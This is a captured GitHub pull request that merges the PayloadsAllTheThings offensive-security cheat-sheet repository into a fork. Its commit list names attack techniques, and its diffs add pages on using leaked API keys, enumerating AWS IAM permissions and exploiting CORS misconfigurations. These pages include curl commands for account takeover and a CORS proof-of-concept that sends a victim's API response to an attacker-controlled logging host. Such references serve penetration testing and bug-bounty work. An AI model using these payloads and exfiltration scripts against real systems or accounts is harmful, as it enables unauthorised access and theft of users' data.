Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[pull] master from swisskyrepo:master #1

Merged
merged 308 commits into from
Dec 30, 2019
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
308 commits
Select commit Hold shift + click to select a range
09d52cd
Merge pull request #53 from jaimingohel/patch-1
swisskyrepo Mar 20, 2019
ea1e5a6
Add authentification bypass
clem9669 Mar 21, 2019
bd9378c
Merge pull request #54 from clem9669/patch-2
swisskyrepo Mar 21, 2019
4b38516
Update README.md
rakeshmane Mar 22, 2019
594e35a
Merge pull request #55 from rakeshmane/patch-1
swisskyrepo Mar 22, 2019
333b9ea
add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
noraj Mar 23, 2019
3b70783
Merge pull request #56 from noraj/patch-1
swisskyrepo Mar 23, 2019
fed4bda
Add XXE inside SVG
ajdumanhug Mar 23, 2019
9d3ecce
Merge pull request #57 from ajdumanhug/master
swisskyrepo Mar 23, 2019
5d1b8bc
SAML exploitation + ASREP roasting + Kerbrute
swisskyrepo Mar 24, 2019
a509909
PostgreSQL RCE CVE-2019–9193 + ADAPE + WinPrivEsc Resources
swisskyrepo Mar 24, 2019
90b182f
AD references - Blog Post + SSTI basic config item
swisskyrepo Mar 24, 2019
bbc9029
XSS in several filetype based on @__Mn1__ blogpost
swisskyrepo Mar 26, 2019
289fa8c
PrivEsc - Linux Task
swisskyrepo Mar 31, 2019
1eb57ad
Reverse shell Golang
kisec Apr 1, 2019
cbc57c7
Merge pull request #58 from kisec/master
swisskyrepo Apr 1, 2019
3af87dd
Reverse shell summary + golang
swisskyrepo Apr 2, 2019
187762f
Fix typo in reverse shell
swisskyrepo Apr 2, 2019
4b79b86
--dc-ip to -dc-ip for psexec cmd
Apr 3, 2019
aaaeb3f
Merge pull request #60 from Zeecka/patch-2
swisskyrepo Apr 3, 2019
546ecd0
Linux Privesc - /etc/passwd writable
swisskyrepo Apr 7, 2019
5686af9
Update README.md
cervoise Apr 8, 2019
eb045a7
Merge pull request #61 from cervoise/patch-1
swisskyrepo Apr 8, 2019
4c6f9e2
Bypass using IPv6/IPv4 Address Embedding
Apr 13, 2019
ee00dc1
Merge pull request #62 from PwnFunction/patch-1
swisskyrepo Apr 13, 2019
c661979
MYSQL Truncation attack + Windows search where
swisskyrepo Apr 14, 2019
b8e74fe
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTh…
swisskyrepo Apr 14, 2019
b4633bb
sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords
swisskyrepo Apr 14, 2019
13864bd
GoGitDumper + MySQL summary rewrite
swisskyrepo Apr 14, 2019
e0dbfc1
Fixed link for google CSP bypass
BillyNoGoat Apr 16, 2019
271cc26
Merge pull request #63 from BillyNoGoat/patch-1
swisskyrepo Apr 16, 2019
49b9d0a
MSQL UDF sys_exec + SSRF IP: 127.1 and 127.0.1
swisskyrepo Apr 20, 2019
e467d60
add nosqli GET example
noraj Apr 21, 2019
9dfd783
mitm6 + ntlmrelayx
swisskyrepo Apr 21, 2019
aac5a57
Merge pull request #64 from noraj/patch-1
swisskyrepo Apr 21, 2019
81f93a1
SSRF AWS Elastic Beanstak
swisskyrepo Apr 21, 2019
4d3ee90
Command injection rewritten
swisskyrepo Apr 21, 2019
5bb27ee
SSRF Google Cloud - add ssh key
swisskyrepo Apr 22, 2019
0ccccd0
add JSON headers
noraj Apr 24, 2019
bd861e3
Merge pull request #65 from noraj/patch-1
swisskyrepo Apr 24, 2019
a458cb3
Use print() function in both Python 2 and Python 3
cclauss Apr 26, 2019
d0f14cb
Merge pull request #66 from cclauss/patch-1
swisskyrepo Apr 26, 2019
2b3f072
XSLT in SAML
swisskyrepo Apr 28, 2019
403cb4e
Remove http:// prefix for DNS queries
roman-mueller May 7, 2019
6bc2972
Merge pull request #67 from roman-mueller/master
swisskyrepo May 7, 2019
765c615
XSS injection Summary + MSF web delivery
swisskyrepo May 12, 2019
bab04f8
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz…
swisskyrepo May 12, 2019
b81df17
RFI - Windows SMB allow_url_include = "Off"
swisskyrepo May 12, 2019
698cc52
README rewrite : BOOKS and YOUTUBE
swisskyrepo May 12, 2019
cc8c7b3
Fix YOUTUBE and BOOKS links
swisskyrepo May 12, 2019
9c2e638
XSS without parenthesis, semi-colon + Lontara
swisskyrepo May 15, 2019
506014d
Some link's markdown was broken
AlexisVLRT May 24, 2019
72c96ad
Merge pull request #70 from AlexisVLRT/master
swisskyrepo May 24, 2019
b1a05d1
Create License
swisskyrepo May 25, 2019
f88da43
SQL informationschema.processlist + UPNP warning + getcap -ep
swisskyrepo May 25, 2019
f570246
Add nginx log files for LFI log poisoning
jonasw234 May 30, 2019
b031115
Merge pull request #71 from jonasw234/master
swisskyrepo May 30, 2019
edcac29
Cloudflare XSS Bypasses by Bohdan Korzhynskyi
bohdansec Jun 5, 2019
00f50c5
Merge pull request #72 from h1-ragnar/patch-1
swisskyrepo Jun 6, 2019
93f6c03
GraphQL + LXD/etc/passwd PrivEsc + Win firewall
swisskyrepo Jun 9, 2019
f5a8a6b
Meterpreter shell
swisskyrepo Jun 9, 2019
adcea1a
Linux PrivEsc + SSH persistency
swisskyrepo Jun 9, 2019
e8cd11f
plink + sshuttle : Network Pivoting Techniques
swisskyrepo Jun 9, 2019
5d4f657
PrivEsc - Common Exploits
swisskyrepo Jun 9, 2019
a85fa5a
Local File Include : rce via mail + kadimus
swisskyrepo Jun 9, 2019
94a60b4
Writable /etc/sudoers + Meterpreter autoroute
swisskyrepo Jun 10, 2019
8cec2e0
Linux PrivEsc - Writable files
swisskyrepo Jun 10, 2019
24a05c7
Update Windows - Privilege Escalation.md
ahhh Jun 11, 2019
6921cde
Merge pull request #73 from ahhh/patch-1
swisskyrepo Jun 11, 2019
9745e67
HQL Injection + references update
swisskyrepo Jun 16, 2019
c3f96c6
GraphQL injection : blind nosqli + sqli
swisskyrepo Jun 21, 2019
9be6267
Add root user + PHP null byte version
swisskyrepo Jun 23, 2019
601db0e
Added freemarker PoC that doesn't require spaces or tags
scarvell Jun 24, 2019
1cec6e9
Merge pull request #75 from scarvell/master
swisskyrepo Jun 24, 2019
7dda79b
ImageMagik Ghost Script + Typo git summary
swisskyrepo Jun 25, 2019
a4411ae
Added 2 working sql injection lines
elonsalfati Jun 28, 2019
b148a9c
Merge pull request #76 from ElonSalfati/master
swisskyrepo Jun 28, 2019
3b85f1b
UTF-8 encoding for File Inclusion
swisskyrepo Jun 29, 2019
144b382
MS14-068 + /etc/security/opasswd
swisskyrepo Jun 29, 2019
46780de
PostgreSQL rewrite + LFI SSH
swisskyrepo Jun 29, 2019
13ba72f
GraphQL + RDP Bruteforce + PostgreSQL RCE
swisskyrepo Jul 1, 2019
f656486
Fix typo in PHP Object injection
swisskyrepo Jul 5, 2019
6cecb8f
GraphQL - Projection + Edges/Nodes
swisskyrepo Jul 5, 2019
05054af
JWT RS256 to HS256 using pubkey to generate a signature
swisskyrepo Jul 10, 2019
bdef021
Magic Hashes SHA224 and SHA256
swisskyrepo Jul 10, 2019
504caa3
SSTI by calling Popen without guessing the offset
swisskyrepo Jul 10, 2019
dab064a
adding reference to blog
LewisArdern Jul 12, 2019
ca331ac
Merge pull request #79 from LewisArdern/patch-1
swisskyrepo Jul 12, 2019
382bd9a
Type Juggling - Another SHA 256
swisskyrepo Jul 14, 2019
3cce80c
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTh…
swisskyrepo Jul 14, 2019
45af613
Active Directory - Unconstrained delegation
swisskyrepo Jul 17, 2019
0b9d76e
HQL references
swisskyrepo Jul 19, 2019
a14b3af
Active Directory - Resource Based Constrained Delegation
swisskyrepo Jul 22, 2019
859695e
Update PrivExchange based on chryzsh blog post
swisskyrepo Jul 24, 2019
f6c0f22
PXE boot attack
swisskyrepo Jul 25, 2019
657823a
PTH Mitigation + Linux Smart Enumeration
swisskyrepo Jul 26, 2019
9812417
EoP - Juicy Potato
swisskyrepo Jul 26, 2019
6baa446
Directory Traversal CVE 2018 Spring
swisskyrepo Jul 27, 2019
a331d87
Better sponsoring method
swisskyrepo Jul 27, 2019
9b96c76
XSS onpointer*
swisskyrepo Aug 1, 2019
bd449e9
XSS PostMessage
swisskyrepo Aug 3, 2019
66c9d94
Update README.md
noraj Aug 6, 2019
9a8b2fe
Merge pull request #83 from noraj/patch-3
swisskyrepo Aug 6, 2019
b6697d8
SSRF SVG + Windows Token getsystem
swisskyrepo Aug 15, 2019
4a17661
CORS Misconfiguration
swisskyrepo Aug 18, 2019
8dffb59
Pspy + Silver Ticket + MSSQL connect
swisskyrepo Aug 18, 2019
3fd0791
Update Linux - Privilege Escalation.md
TH3xACE Aug 18, 2019
e0220d1
Merge pull request #85 from TH3xACE/patch-1
swisskyrepo Aug 19, 2019
6c161f2
JWT None alternative + MS15-051
swisskyrepo Aug 22, 2019
7b6c8d4
Add dot filter bypass with decimal IP
JLLeitschuh Aug 28, 2019
bb305d0
Network Discovery - Masscan update
swisskyrepo Aug 28, 2019
72c54b5
add missing backtick
noraj Aug 29, 2019
da3bdc5
Merge pull request #87 from noraj/patch-1
swisskyrepo Aug 29, 2019
c6824e7
Merge pull request #86 from JLLeitschuh/patch-1
swisskyrepo Aug 29, 2019
0625e2a
Add Host/Split Unicode Normalization
ricardojba Aug 30, 2019
2a4c4f4
Merge pull request #88 from ricardojba/patch-1
swisskyrepo Aug 30, 2019
3ca07ae
Docker Privesc - Unix socket
swisskyrepo Aug 30, 2019
2b1900e
PrivEsc - sudoers + Upload PHP
swisskyrepo Sep 2, 2019
5455c30
Juicy Potato + XXE update
swisskyrepo Sep 8, 2019
742e320
SharpPersist - Windows Persistence
swisskyrepo Sep 13, 2019
e6f94af
Update FUNDING.yml with buymeacoffee
swisskyrepo Sep 13, 2019
a091724
Pebble - Server Side Template Injection
swisskyrepo Sep 17, 2019
8822199
Add XXE payload inside SVG
Techbrunch Sep 17, 2019
8061cdd
Merge pull request #92 from Techbrunch/patch-2
swisskyrepo Sep 18, 2019
9a02958
API Key Leaks - Twitter/Twilio/Gitlab
swisskyrepo Sep 22, 2019
3221197
RCE vBulletin + findomain
swisskyrepo Sep 26, 2019
3fb2a90
Add Spyse to network discovery
Luci-d Sep 30, 2019
6a11a6c
Merge pull request #94 from Luci-d/patch-1
swisskyrepo Sep 30, 2019
f2beb0d
Add local DTD section to the XXE Injection page
h3xstream Oct 1, 2019
e1e5397
Merge pull request #96 from h3xstream/master
swisskyrepo Oct 2, 2019
e180d1f
Fix dead youtube link
marcan2020 Oct 3, 2019
4f38666
Add .NET references
marcan2020 Oct 3, 2019
920da73
Add Angular automatic sanitization
marcan2020 Oct 3, 2019
cb9b7a1
Merge pull request #97 from marcan2020/patch-2
swisskyrepo Oct 3, 2019
54d6161
Merge pull request #98 from marcan2020/patch-3
swisskyrepo Oct 3, 2019
8b0bd4d
Merge pull request #99 from marcan2020/patch-4
swisskyrepo Oct 3, 2019
3576583
SSRF URL for Google Cloud
swisskyrepo Oct 6, 2019
9f463d1
little changes
noraj Oct 9, 2019
320a9fa
Merge pull request #100 from noraj/patch-1
swisskyrepo Oct 9, 2019
03d02cc
Create readme.md
Ali-Yazdani Oct 11, 2019
57628ff
Merge pull request #101 from Ali-Yazdani/patch-1
swisskyrepo Oct 11, 2019
05b3e13
SSRF for ECS
swisskyrepo Oct 12, 2019
f0af3b4
Update Active Directory Attack.md
op01 Oct 15, 2019
6a81a13
Merge pull request #102 from op01/master
swisskyrepo Oct 15, 2019
52d02ce
Update readme.md
Ali-Yazdani Oct 16, 2019
b22742b
Merge pull request #103 from Ali-Yazdani/patch-1
swisskyrepo Oct 16, 2019
83caef8
Add filter iconv utf16 LFI bypass tricks
Oct 17, 2019
67a68d7
Merge pull request #105 from Zeecka/patch-3
swisskyrepo Oct 17, 2019
8eae039
netdoc:// wrapper for Java SSRF
swisskyrepo Oct 17, 2019
7159a3d
RODC dcsync note + Dumping AD Domain summary
swisskyrepo Oct 17, 2019
ed252df
krb5.keytab + credential use summary
swisskyrepo Oct 20, 2019
b54142c
Update Reverse Shell Cheatsheet.md
NoPurposeInLife Oct 20, 2019
11fc6e4
NTLM relay + MS08-068
swisskyrepo Oct 20, 2019
727eb5c
Drop the MIC
swisskyrepo Oct 21, 2019
c6b5bba
fix TOC links
noraj Oct 22, 2019
3464611
Merge pull request #107 from noraj/patch-1
swisskyrepo Oct 22, 2019
88f0203
Out of band XPATH
swisskyrepo Oct 22, 2019
5b59da7
Update MySQL Injection.md
cyber-niz Oct 25, 2019
32c18fd
Merge pull request #108 from nizam0906/master
swisskyrepo Oct 25, 2019
aef5bb8
Update jsonp_endpoint.txt
cyber-niz Oct 25, 2019
882eec0
Merge pull request #109 from nizam0906/master
swisskyrepo Oct 26, 2019
f35ace9
Update PostgreSQL Injection.md
cyber-niz Oct 26, 2019
525429c
XPATH: add tools
noraj Oct 26, 2019
68f1a17
Merge pull request #110 from nizam0906/master
swisskyrepo Oct 26, 2019
56ec623
Merge pull request #111 from noraj/patch-1
swisskyrepo Oct 26, 2019
3dcd442
Added more PostgreSQL Injection Queries
cyber-niz Oct 28, 2019
ab341cf
Updated Blind XSS endpoint
cyber-niz Oct 28, 2019
135af74
Update README.md
Q5Ca Oct 28, 2019
be3ef08
Merge pull request #112 from nizam0906/master
swisskyrepo Oct 28, 2019
534d46d
Merge pull request #113 from Q5Ca/patch-1
swisskyrepo Oct 28, 2019
5094ef8
XXE in XLSX
swisskyrepo Oct 28, 2019
5211990
add XXEinjector
noraj Oct 28, 2019
bb2c247
Added List Database Administrator Accounts
cyber-niz Oct 29, 2019
b256942
Merge pull request #114 from noraj/patch-1
swisskyrepo Oct 29, 2019
377aad4
Merge pull request #115 from nizam0906/master
swisskyrepo Oct 29, 2019
bb7e6b7
Update README.md
NoPurposeInLife Oct 29, 2019
34d8853
Merge pull request #1 from Hi15358/patch-1
NoPurposeInLife Oct 29, 2019
b7fdf8a
Merge pull request #106 from Hi15358/master
swisskyrepo Oct 29, 2019
f81f944
Added More Ways to Detect columns number
cyber-niz Oct 29, 2019
614e8a9
Updated Detect columns number
cyber-niz Oct 29, 2019
7d6fab9
Update Detect columns number
cyber-niz Oct 29, 2019
a33dce0
Fixed Broken Links
cyber-niz Oct 29, 2019
ca59b1d
Fixed Broken Links in MSSQL Injection
cyber-niz Oct 29, 2019
20d6599
Added Summary
cyber-niz Oct 29, 2019
4b1f7e6
Fixed Broken Links in PostgreSQL Injection
cyber-niz Oct 29, 2019
a69c2ac
Added Summary in SQLite Injection
cyber-niz Oct 29, 2019
fe8c7be
Fixed Broken Links in SQL injection README.md
cyber-niz Oct 29, 2019
4d94e55
Added Summary in Cassandra Injection
cyber-niz Oct 29, 2019
d41e0d3
Added Summary in Hibernate Query Language Injection
cyber-niz Oct 29, 2019
55d1731
Merge pull request #116 from nizam0906/master
swisskyrepo Oct 29, 2019
694e9e4
Added an alternate possible Found condition to POST
Reelix Oct 29, 2019
6b22d53
Fix lua reverse shell quote issue
cydave Oct 29, 2019
535ad5b
Merge pull request #118 from cydave/cydave-patch-1
swisskyrepo Oct 29, 2019
069463f
Merge pull request #117 from Reelix/patch-1
swisskyrepo Oct 29, 2019
757e1c1
Merge pull request #2 from swisskyrepo/master
NoPurposeInLife Oct 30, 2019
b36e526
Create Readme
NoPurposeInLife Oct 30, 2019
bd121bf
Delete Readme
NoPurposeInLife Oct 30, 2019
5f31044
Create ReadMe.txt
NoPurposeInLife Oct 30, 2019
5fec4f7
Update Java.md
NoPurposeInLife Oct 30, 2019
83569c6
Update and rename ReadMe.txt to README.md
NoPurposeInLife Oct 30, 2019
952b3c0
Merge pull request #119 from Hi15358/master
swisskyrepo Oct 30, 2019
83f46a2
add XXE via SVG rasterization
noraj Nov 1, 2019
775d10c
Fix awk snippet
cydave Nov 3, 2019
3585b1f
Merge pull request #120 from cydave/patch-1
swisskyrepo Nov 3, 2019
64f8f4d
add ref for docker SSRF
noraj Nov 3, 2019
54c94e0
add ref for docker SSRF
noraj Nov 3, 2019
e3604c0
XXE: tools description + more tools
noraj Nov 4, 2019
adaa93b
Merge pull request #121 from noraj/patch-3
swisskyrepo Nov 4, 2019
4eae23a
Merge pull request #122 from noraj/patch-4
swisskyrepo Nov 4, 2019
6005021
Impersonating Office 365 Users on Azure AD Connect
swisskyrepo Nov 4, 2019
24516ca
Kubernetes attacks update + ref to securityboulevard
swisskyrepo Nov 5, 2019
6fecedd
MXSS - Mutated XSS - Google POC
swisskyrepo Nov 6, 2019
f6d5221
SID history break trust + Powershell history + SCF files
swisskyrepo Nov 7, 2019
43f185d
CVE-2019-1322 UsoSvc
swisskyrepo Nov 11, 2019
221b353
fix invalid link
bash-c Nov 14, 2019
6ca8aa8
Merge pull request #123 from bash-c/patch-1
swisskyrepo Nov 14, 2019
eac33e7
Added new payloads
yehgdotnet Nov 14, 2019
255a8c3
Merge pull request #124 from yehgdotnet/patch-1
swisskyrepo Nov 14, 2019
7f266bf
mitm ipv6 + macOS kerberoasting
swisskyrepo Nov 14, 2019
3a384c3
Password spray + AD summary re-org
swisskyrepo Nov 14, 2019
639dc9f
.url file in writeable share
swisskyrepo Nov 14, 2019
00684a1
IIS asp shell with .asa, .cer, .xamlx
swisskyrepo Nov 16, 2019
6a398ca
Ruby: add slim
noraj Nov 16, 2019
886a0b9
Merge pull request #125 from noraj/patch-3
swisskyrepo Nov 16, 2019
3abaa3e
Linux AD - Keyring, Keytab, CCACHE
swisskyrepo Nov 25, 2019
06864b0
Password spraying rewrite + Summary fix
swisskyrepo Nov 25, 2019
c60f264
RDP backdoor + RDP session takeover
swisskyrepo Nov 26, 2019
f44d014
Copy this -> Cut this
trietptm Dec 2, 2019
c125b35
Merge pull request #127 from trietptm/master
swisskyrepo Dec 2, 2019
ac0239d
Merge pull request #128 from noraj/patch-1
swisskyrepo Dec 2, 2019
e92126a
Merge pull request #129 from noraj/patch-2
swisskyrepo Dec 2, 2019
286f7ca
Bypass XSS filters on alert
clem9669 Dec 3, 2019
21101ec
Merge pull request #130 from clem9669/patch-3
swisskyrepo Dec 3, 2019
6f4a28e
Slim RCE + CAP list
swisskyrepo Dec 5, 2019
e95b0c3
clarify AngularJS vs Angular
js-kyle Dec 6, 2019
ba9fce8
Merge pull request #131 from js-kyle/angularjs
swisskyrepo Dec 7, 2019
896e262
Privilege impersonation and GraphQL SQLi
swisskyrepo Dec 11, 2019
0376291
Fixed Broken Links in API Key Leaks
cyber-niz Dec 17, 2019
4588cc2
Merge pull request #135 from nizam0906/patch-1
swisskyrepo Dec 17, 2019
d6d649e
Added Summary in CRLF
cyber-niz Dec 17, 2019
156ea32
Updated Summary and Fixed Broken Links in CSRF
cyber-niz Dec 17, 2019
4de5a20
Fixed Broken Links in Command Injection
cyber-niz Dec 17, 2019
6939499
Fixed Broken Links in Directory traversal
cyber-niz Dec 17, 2019
9764030
Merge pull request #136 from nizam0906/patch-2
swisskyrepo Dec 17, 2019
4c96a5a
Merge pull request #137 from nizam0906/patch-3
swisskyrepo Dec 17, 2019
ada158c
Merge pull request #138 from nizam0906/patch-4
swisskyrepo Dec 17, 2019
02f714d
Merge pull request #139 from nizam0906/patch-5
swisskyrepo Dec 17, 2019
cf5a4b6
XSLT injection draft
swisskyrepo Dec 17, 2019
1535c5f
Kubernetes - Privileged Service Account Token
swisskyrepo Dec 20, 2019
4b10c5e
AD mitigations
swisskyrepo Dec 26, 2019
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
The table of contents is too big for display.
Diff view
Diff view
  •  
  •  
  •  
5 changes: 5 additions & 0 deletions .github/FUNDING.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
# These are supported funding model platforms

github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
ko_fi: swissky # Replace with a single Ko-fi username
custom: https://www.buymeacoffee.com/swissky
93 changes: 93 additions & 0 deletions API Key Leaks/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,93 @@
# API Key Leaks

> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares.

## Summary

- [Tools](#tools)
- [Exploit](#exploit)
- [Algolia](#algolia)
- [AWS Access Key ID & Secret](#aws-access-key-id--secret)
- [Slack API Token](#slack-api-token)
- [Facebook Access Token](#facebook-access-token)
- [Github client id and client secret](#github-client-id-and-client-secret)
- [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
- [Twitter API Secret](#twitter-api-secret)
- [Twitter Bearer Token](#twitter-bearer-token)
- [Gitlab Personal Access Token](#gitlab-personal-access-token)

## Tools

- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)

## Exploit

The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.

### Algolia

```powershell
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
```

### AWS Access Key ID & Secret

```powershell
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
./enumerate-iam.py --access-key AKIA... --secret-key XXX..
```

### Slack API Token

```powershell
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
```

### Facebook Access Token

```powershell
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
```

### Github client id and client secret

```powershell
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
```

### Twilio Account_sid and Auth token

```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
```

### Twitter API Secret

```powershell
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
```

### Twitter Bearer Token

```powershell
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
```

### Gitlab Personal Access Token

```powershell
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
```


## References

* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
31 changes: 30 additions & 1 deletion AWS Amazon Bucket S3/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@
result = s3.list_buckets()
print(result)
except Exception as e:
print(e
print(e)
```

## AWS Configuration
Expand Down Expand Up @@ -184,6 +184,32 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/


## Enumerate IAM permissions

Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)

```powershell
git clone [email protected]:andresriancho/enumerate-iam.git
cd enumerate-iam/
pip install -r requirements.txt
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
"RoleDetailList": [
{
"Tags": [],
"AssumeRolePolicyDocument": {
"Version": "2008-10-17",
"Statement": [
{
...
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
```

## References

Expand All @@ -192,3 +218,6 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
22 changes: 22 additions & 0 deletions BOOKS.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
# Book's list

Grab a book and relax, these ones are the best security books (in my opinion).

- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
90 changes: 90 additions & 0 deletions CORS Misconfiguration/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,90 @@
# CORS Misconfiguration

> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials.

## Summary

* [Prerequisites](#prerequisites)
* [Exploitation](#exploitation)
* [References](#references)

## Prerequisites

* BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`

## Exploitation

Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.

### Vulnerable example

```powershell
GET /endpoint HTTP/1.1
Host: victim.example.com
Origin: https://evil.com
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true

{"[private API key]"}
```

### Proof of concept

```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```

or

```html
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhr.open("GET",
"https://victim.example.com/endpoint", true);
xhr.withCredentials = true;
xhr.send();
}
</script>
</body>
</html>
```

## Bug Bounty reports

* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)

## References

